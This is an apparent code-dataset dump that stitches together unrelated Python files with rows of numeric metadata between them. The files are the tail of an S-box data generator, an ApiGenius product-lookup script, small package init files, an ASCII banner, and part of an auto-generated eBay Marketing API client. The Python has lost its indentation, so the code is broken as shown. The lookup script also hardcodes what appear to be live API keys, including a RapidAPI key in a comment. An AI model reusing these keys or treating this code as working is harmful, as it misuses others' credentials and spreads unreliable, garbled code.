2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 32, 64, 144], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 17, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [2, 4, 8, 16, 32, 65, 129], [2, 4, 8, 32, 81, 129, 144], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 32, 64, 144], [1, 2, 24, 32, 64, 132], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 48, 64, 128], [2, 4, 8, 17, 64, 128], [1, 4, 8, 16, 98, 128], [1, 4, 8, 16, 98, 128], [4, 10, 18, 24, 33, 40, 48, 65, 80, 98, 129, 144], [255])
ret.append((name, sbox, n, m, dppt))
name = '1-bit carry adder'
n, m = (3, 2)
sbox = [int(x + y + c >= 2) * 2 + (x ^ y ^ c) for x in range(2) for y in range(2) for c in range(2)]
dppt = ([0], [1, 2], [1, 2], [2], [1, 2], [2], [2], [3])
ret.append((name, sbox, n, m, dppt))
# bij
for n in range(5, 9):
for t in range(5):
n = m = n
sbox = list(range(2**n))
shuffle(sbox)
ret.append(("rand-bij", sbox, n, m, None))
# non-bij
for n in range(5, 9):
for m in range(n - 3, n + 3):
sbox = [randrange(2**m) for i in range(2**n)]
ret.append(("rand-nbij", sbox, n, m, None))
return ret
| 246.466667
| 7,795
| 0.435218
| 2,714
| 11,091
| 1.778187
| 0.107959
| 0.10775
| 0.157273
| 0.20058
| 0.728139
| 0.714671
| 0.699959
| 0.67385
| 0.635723
| 0.623912
| 0
| 0.536824
| 0.263006
| 11,091
| 44
| 7,796
| 252.068182
| 0.053585
| 0.000992
| 0
| 0.176471
| 0
| 0
| 0.004604
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.029412
| 0
| 0.088235
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77f92727d6ce9133123fa4078b0d5d5ec32b8d5b
| 22,613
|
py
|
Python
|
python/productDataApi.py
|
tunchunairarko/mern-btzapp
|
d8526525cfd69e2884464c30706a43977bafb22b
|
[
"MIT"
] | null | null | null |
python/productDataApi.py
|
tunchunairarko/mern-btzapp
|
d8526525cfd69e2884464c30706a43977bafb22b
|
[
"MIT"
] | null | null | null |
python/productDataApi.py
|
tunchunairarko/mern-btzapp
|
d8526525cfd69e2884464c30706a43977bafb22b
|
[
"MIT"
] | null | null | null |
import requests
import dpath # https://github.com/akesterson/dpath-python
from pprint import pprint # Needed for printing responses, can be deleted.
import re
import AzProductInformation
class ProductDataUPC(object):
def __init__(self,query):
self.keys={
'primary':'aed3a12f05464b8abb54c24d2750e377'
}
self.headers={
'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
}
self.url="https://api.apigenius.io/products/"
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
self.upc=''
def get_upc_from_mpn(self,query=''):
if not(query==''):
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
query_url=self.url+'/identifiers?mpn='+self.query
r=requests.get(query_url,headers=self.headers)
data=r.json()
if(data['status']==404):
return ''
return data['items']['upc']
class ProductDataAPIWithKeyword(object):
def __init__(self,query):
self.keys={
'primary':'aed3a12f05464b8abb54c24d2750e377'
}
self.headers={
'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
}
self.url="https://api.apigenius.io/products/"
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
self.image=[]
self.description=''
self.product_list=[]
def get_query_details(self):
endpoints=['identifiers','lookup','product-data','search']
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&api_key='+self.keys['primary']
# print(query_url)
r=requests.get(query_url,headers=self.headers)
data=r.json()
#print(data)
if(data['status']==404):
self.product_list.append({})
return
return data['items']['upc']
class ProductDataAPIWithMPN(object):
def __init__(self,query):
self.keys={
'primary':'aed3a12f05464b8abb54c24d2750e377'
}
self.headers={
'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
}
self.url="https://api.apigenius.io/products/"
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
self.image=[]
self.description=''
self.product_list=[]
self.product = self.get_query_details()
def get_query_details(self):
endpoints=['identifiers','lookup','product-data','search']
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&mpn='+self.query+'&api_key='+self.keys['primary']
# print(query_url)
r=requests.get(query_url,headers=self.headers)
data=r.json()
#print(data)
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'',
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
class ProductDataAPI(object):
def __init__(self,query):
self.keys={
'primary':'aed3a12f05464b8abb54c24d2750e377'
}
self.headers={
'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
}
self.url="https://api.apigenius.io/products/"
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
self.image=[]
self.description=''
self.product_list=[]
self.product = self.get_query_details()
def get_query_details(self):
endpoints=['identifiers','lookup','product-data','search']
ql=len(self.query)
if(self.query.isdigit()==True):
#1st case: check if it is a upc
# ql=len(self.query)
if(ql>=11 and ql<13):#UPC CONFIRMED
query_url=self.url+endpoints[1]+'?upc='+self.query+'&api_key='+self.keys['primary']
r=requests.get(query_url,headers=self.headers)
data=r.json()
print(r.status_code)
if(r.status_code==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'',
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
else:
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&mpn='+self.query+'&api_key='+self.keys['primary']
# print(query_url)
r=requests.get(query_url,headers=self.headers)
data=r.json()
print(r.status_code)
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'',
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
else:
regex=r'sky[0-9]{4,6}$'
match=re.match(regex,self.query,flags=re.IGNORECASE)
if(match): #BEST CHOICE PRODUCTS
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&mpn='+self.query+'&api_key='+self.keys['primary']
# print(query_url)
r=requests.get(query_url,headers=self.headers)
data=r.json()
print(r.status_code)
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'',
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
# print('lsadf')
print(e)
pass
self.product_list.append(item)
return
if(ql==10) and (any(char.isdigit() for char in self.query)==True):#there is a chance it is an ASIN
regex=r'([A-Z0-9]{10})'
match=re.match(regex,self.query)
if(match):
api=AzProductInformation.AzProductInformation(self.query)
prodSearch=api.product_list[0]
if not(prodSearch['model_no']==None):
mpn=prodSearch['model_no']
query_url=self.url+endpoints[3]+'?keyword='+mpn+'&mpn='+mpn+'&api_key='+self.keys['primary']
r=requests.get(query_url,headers=self.headers)
data=r.json()
print(r.status_code)
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'',
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
else:
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&api_key='+self.keys['primary']
r=requests.get(query_url,headers=self.headers)
print(r.status_code)
data=r.json()
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'' ,
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
else:
if(self.query.find(' ')==-1):
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&mpn='+self.query+'&api_key='+self.keys['primary']
# print(query_url)
r=requests.get(query_url,headers=self.headers)
data=r.json()
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'' ,
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
return
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&api_key='+self.keys['primary']
r=requests.get(query_url,headers=self.headers)
data=r.json()
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'' ,
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
# try:https://api.apigenius.io/products/search?keyword=0003093730273&mpn=0003093730273&api_key=5db34e7105f6491e99b02f4d5fca37c0
# query=int(self.query)
# # querystring={'upc':query,'api_key':self.keys['primary']}
# # r = requests.request("GET", self.url, headers=self.headers, params=querystring)
# r=requests.get(query_url,headers=self.headers)
# data=r.json()
# if(data['status']==404):
# return
# #print(data)
# except Exception as e:
# #2nd case: Check if the query is a keyword or not
# ql=len(self.query)
# if(ql==10) and (any(char.isdigit() for char in self.query)==True):#there is a chance it is an ASIN
# #3rd case: check if it is an ASIN
# regex=r'([A-Z0-9]{10})'
# match=re.match(regex,self.query)
# if(match):
# api=AzProductInformation.AzProductInformation(self.query)
# prodSearch=api.product_list[0]
# if not(prodSearch['model_no']==None):
# upc=prodSearch['model_no']
# query_url=self.url+endpoints[1]+'?upc='+upc+'&api_key='+self.keys['primary']
# r=requests.get(query_url,headers=self.headers)
# data=r.json()
# querystring={"upc":self.query}
# r = requests.request("GET", self.url, headers=self.headers, params=querystring)
# data=r.json()
# if(data['status']==404):
# return
# self.image=data['items']['images']
# self.description=data['items']['description']
# headers = {
# 'x-rapidapi-host': "product-data1.p.rapidapi.com",
# 'x-rapidapi-key': "3edae6ad4emsh2286662ae9bcb68p1bb68djsn63c5cf6f2cc6"
# }
# r = requests.request("GET", url, headers=headers, params=querystring)
# print(r.json())
def main():
# p=ProductDataUPC('SKY1263')
p=ProductDataAPIWithKeyword('x00192KM3T')
print(p.product_list)
if __name__=='__main__':
main()
| 41.721402
| 135
| 0.411489
| 1,939
| 22,613
| 4.71738
| 0.080454
| 0.106264
| 0.046463
| 0.049196
| 0.889472
| 0.881929
| 0.870559
| 0.866186
| 0.851099
| 0.84596
| 0
| 0.029898
| 0.440897
| 22,613
| 542
| 136
| 41.721402
| 0.693585
| 0.088356
| 0
| 0.891949
| 0
| 0
| 0.166521
| 0.012454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019068
| false
| 0.050847
| 0.010593
| 0
| 0.065678
| 0.065678
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
77f93961df00cd63e5db98ca11469933e2c1b639
| 124
|
py
|
Python
|
py/src/datacentric/types/time/__init__.py
|
datacentricorg/datacentric
|
b9e2dedfac35759ea09bb5653095daba5861512e
|
[
"Apache-2.0"
] | 1
|
2019-08-08T01:27:47.000Z
|
2019-08-08T01:27:47.000Z
|
py/src/datacentric/types/time/__init__.py
|
datacentricorg/datacentric
|
b9e2dedfac35759ea09bb5653095daba5861512e
|
[
"Apache-2.0"
] | null | null | null |
py/src/datacentric/types/time/__init__.py
|
datacentricorg/datacentric
|
b9e2dedfac35759ea09bb5653095daba5861512e
|
[
"Apache-2.0"
] | null | null | null |
from datacentric.types.time.iso_day_of_week import IsoDayOfWeek
from datacentric.types.time.local_minute import LocalMinute
| 41.333333
| 63
| 0.887097
| 18
| 124
| 5.888889
| 0.722222
| 0.283019
| 0.377358
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 124
| 2
| 64
| 62
| 0.913793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
7af14fd96cfb76681c30796807edc66ed015682c
| 46
|
py
|
Python
|
frarch/utils/logging/__init__.py
|
victorbadenas/frarch
|
e75e2a63aaf14cf797ffffc901ca382b3d88b7b0
|
[
"Apache-2.0"
] | 1
|
2021-12-21T11:00:28.000Z
|
2021-12-21T11:00:28.000Z
|
frarch/utils/logging/__init__.py
|
vbadenas/frarch
|
3ce8cfad90b09153cbd22dee975731cae13e3ba7
|
[
"Apache-2.0"
] | 5
|
2021-11-23T11:08:28.000Z
|
2021-12-21T14:02:14.000Z
|
frarch/utils/logging/__init__.py
|
vbadenas/frarch
|
3ce8cfad90b09153cbd22dee975731cae13e3ba7
|
[
"Apache-2.0"
] | 1
|
2022-03-20T23:47:16.000Z
|
2022-03-20T23:47:16.000Z
|
from .create_logger import create_logger_file
| 23
| 45
| 0.891304
| 7
| 46
| 5.428571
| 0.714286
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bb2aaa2685641d5ed14dc44f506d92e20ddfe00b
| 865
|
py
|
Python
|
nurbsvisualizer/__init__.py
|
FernandezErbes/nurbsvisualizer
|
d69e214448fa274ac6cd30b614e161e8bc22bbe6
|
[
"MIT"
] | null | null | null |
nurbsvisualizer/__init__.py
|
FernandezErbes/nurbsvisualizer
|
d69e214448fa274ac6cd30b614e161e8bc22bbe6
|
[
"MIT"
] | null | null | null |
nurbsvisualizer/__init__.py
|
FernandezErbes/nurbsvisualizer
|
d69e214448fa274ac6cd30b614e161e8bc22bbe6
|
[
"MIT"
] | null | null | null |
import nurbsvisualizer.bsplinegeometry
import nurbsvisualizer.nurbsgeometry
import nurbsvisualizer.utilities
import nurbsvisualizer.visualizer
import sys
sys.path.append('..')
print(" \n")
print(" _ __ __ _ ___ ___ ")
print(" / | / /_ _______/ /_ ____| | / (_)______ ______ _/ (_)___ ___ _____")
print(" / |/ / / / / ___/ __ \/ ___/ | / / / ___/ / / / __ `/ / /_ / / _ \/ ___/")
print(" / /| / /_/ / / / /_/ (__ )| |/ / (__ ) /_/ / /_/ / / / / /_/ __/ / ")
print("/_/ |_/\__,_/_/ /_.___/____/ |___/_/____/\__,_/\__,_/_/_/ /___/\___/_/ ")
print("\n Created by Federico Fernández Erbes ")
print(" All results without warranty \n")
| 54.0625
| 85
| 0.42659
| 37
| 865
| 6.810811
| 0.540541
| 0.198413
| 0.238095
| 0.238095
| 0.119048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 865
| 15
| 86
| 57.666667
| 0.485549
| 0
| 0
| 0
| 0
| 0.285714
| 0.705202
| 0.03237
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.357143
| 0
| 0.357143
| 0.571429
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
248b72f8b6d7d19ce9c4cd65f7163713f784ccee
| 92,017
|
py
|
Python
|
src/ebay_rest/api/sell_marketing/api/ad_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_marketing/api/ad_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_marketing/api/ad_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Marketing API
<p>The <i>Marketing API </i> offers two platforms that sellers can use to promote and advertise their products:</p> <ul><li><b>Promoted Listings</b> is an eBay ad service that lets sellers set up <i>ad campaigns </i> for the products they want to promote. eBay displays the ads in search results and in other marketing modules as <b>SPONSORED</b> listings. If an item in a Promoted Listings campaign sells, the seller is assessed a Promoted Listings fee, which is a seller-specified percentage applied to the sales price. For complete details, see <a href=\"/api-docs/sell/static/marketing/promoted-listings.html\">Promoted Listings</a>.</li> <li><b>Promotions Manager</b> gives sellers a way to offer discounts on specific items as a way to attract buyers to their inventory. Sellers can set up discounts (such as \"20% off\" and other types of offers) on specific items or on an entire customer order. To further attract buyers, eBay prominently displays promotion <i>teasers</i> throughout buyer flows. For complete details, see <a href=\"/api-docs/sell/static/marketing/promotions-manager.html\">Promotions Manager</a>.</li></ul> <p><b>Marketing reports</b>, on both the Promoted Listings and Promotions Manager platforms, give sellers information that shows the effectiveness of their marketing strategies. The data gives sellers the ability to review and fine tune their marketing efforts.</p> <p class=\"tablenote\"><b>Important!</b> Sellers must have an active eBay Store subscription, and they must accept the <b>Terms and Conditions</b> before they can make requests to these APIs in the Production environment. There are also site-specific listings requirements and restrictions associated with these marketing tools, as listed in the \"requirements and restrictions\" sections for <a href=\"/api-docs/sell/marketing/static/overview.html#PL-requirements\">Promoted Listings</a> and <a href=\"/api-docs/sell/marketing/static/overview.html#PM-requirements\">Promotions Manager</a>.</p> <p>The table below lists all the Marketing API calls grouped by resource.</p> # noqa: E501
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...sell_marketing.api_client import ApiClient
class AdApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def bulk_create_ads_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_create_ads_by_inventory_reference # noqa: E501
This method adds multiple listings that are managed with the Inventory API to an existing Promoted Listings campaign. For each listing specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its inventoryReferenceId and inventoryReferenceType, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads to with using the campaign_id path parameter. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). You can specify a maximum of 500 items per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_ads_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdsByInventoryReferenceRequest body: The container for the bulk request to create ads for eBay inventory reference IDs. eBay inventory reference IDs are seller-defined IDs used by theInventory API. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkCreateAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_create_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_create_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def bulk_create_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_create_ads_by_inventory_reference # noqa: E501
This method adds multiple listings that are managed with the Inventory API to an existing Promoted Listings campaign. For each listing specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its inventoryReferenceId and inventoryReferenceType, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads to with using the campaign_id path parameter. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). You can specify a maximum of 500 items per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdsByInventoryReferenceRequest body: The container for the bulk request to create ads for eBay inventory reference IDs. eBay inventory reference IDs are seller-defined IDs used by theInventory API. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkCreateAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_create_ads_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `bulk_create_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_create_ads_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/bulk_create_ads_by_inventory_reference', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkCreateAdsByInventoryReferenceResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def bulk_create_ads_by_listing_id(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_create_ads_by_listing_id # noqa: E501
This method adds multiple listings to an existing Promoted Listings campaign using listingId values generated by either the Trading API or Inventory API. For each listing ID specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its listingId, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads with using the campaign_id path parameter. Listing IDs are generated by eBay when a seller creates listings with the Trading API. You can specify a maximum of 500 listings per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_ads_by_listing_id(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdRequest body: The container for the bulk request to create ads for eBay listing IDs. eBay listing IDs are generated by the Trading API and Inventory API when the listing is created on eBay. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkAdResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_create_ads_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
